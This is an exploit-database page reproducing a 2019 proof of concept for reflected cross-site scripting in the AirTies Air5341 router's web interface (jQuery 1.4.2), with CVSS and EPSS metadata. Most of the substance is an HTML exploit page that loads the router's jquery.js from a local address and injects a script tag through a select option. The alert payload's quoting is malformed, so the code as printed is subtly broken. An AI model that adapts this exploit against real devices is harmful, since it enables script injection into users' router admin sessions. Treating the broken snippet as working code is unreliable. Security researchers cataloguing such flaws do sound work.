Advertisement






AirTies Air5341 XSS Reflected JQuery

CVE Category Price Severity
N/A CWE-79 N/A Medium
Author Risk Exploitation Type Date
Unknown High Remote 2019-07-26
CPE
cpe:cpe:/a:airties:air5341
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019070119

Below is a copy:

AirTies Air5341 XSS Reflected JQuery
# Exploit Title: AirTies Air5341 XSS Reflected JQuery 1.4.2
# Date: 10-09-2017
# Exploit Author: God3err
# Version: AirTies Air5341 Firmware 1.0.0.12
# Tested on: Komutan Linux - Debian

Exploits :
----------------------------

<html>
<head>
  <meta charset="utf-8">
  <title>God3err XSS Protect </title>
  <script src="http://192.168.2.1/js/jquery.js"></script>
  <script>
    $(function() {
      $('#users').each(function() {
        var select = $(this);
        var option = select.children('option').first();
        select.after(option.text());
        select.hide();
      });
    });
  </script>
</head>


<body>
  <form method="post">
    <p>
      <select id="users" name="users">
        <option value="xssreflected"><script>alert('God3err Xss Founded;);</script></option>
      </select>
    </p>
  </form>
</body>
</html>

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum